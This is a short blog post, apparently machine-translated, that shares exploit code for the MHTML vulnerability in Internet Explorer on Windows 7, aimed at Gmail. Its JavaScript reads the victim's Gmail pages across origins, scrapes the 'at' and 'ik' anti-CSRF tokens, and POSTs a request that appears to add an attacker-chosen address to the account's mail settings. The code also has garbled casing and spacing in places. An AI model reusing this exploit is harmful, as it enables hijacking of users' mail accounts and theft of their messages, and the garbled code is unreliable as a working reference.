A piece of WIN7 under the GMAIL MHTML vulnerability exploit code

Long time no update blog, turned to a Win7 GMAIL MHtml vulnerability test code, the last completed version does not know where to go - -!

MHtml vulnerability under Win7
to initiate AJax request, unlike XP directly request HTTP protocol, the requested URL must also be in the MHtml protocol, otherwise there is no permission, the homologous strategy under Win7 looks like XP strict? I don't know if anyone noticed this detail.

To attack GMAIL for related authority CSRF, you must take AT and IK two parameters to be successful. Of course, there are many ways to take these two parameters, which can be taken from COOKIE or directly from the page. The following code is taken directly from the page.

xmlHttp=new ActiveXObject("Microsoft.XMLHttp");
XMLHttp.open("GET","mHtml:https://mail.google.com/mail/h/0/", True);
XMLHttp.send();

XMLHttp.onreadystatechange = function() {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200 ) {
REX = /href=\\".*?at=(.{34})\\">/.exec(XMLHttp.responseText);
AThash = RegExp.$1;
XMLHttp. Open("GET","mHtml:https://mail.google.com/mail/",true);
XMLHttp.send();
XMLHttp.onreadystatechange = function() {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200) {
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText);
IKhash = RegExp.$1;
XMLHttp.open("POST","mHtml:https://mail.google.com/mail/?ui=2"+"&ik= "+IKhash+"&vIEw=mdlg&at="+AThash,true);
XMLHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttp. Send("mdrp=1&mda=%0D%0A"+Tmail+"%0D%0A");
}
}
}
}
}
}
}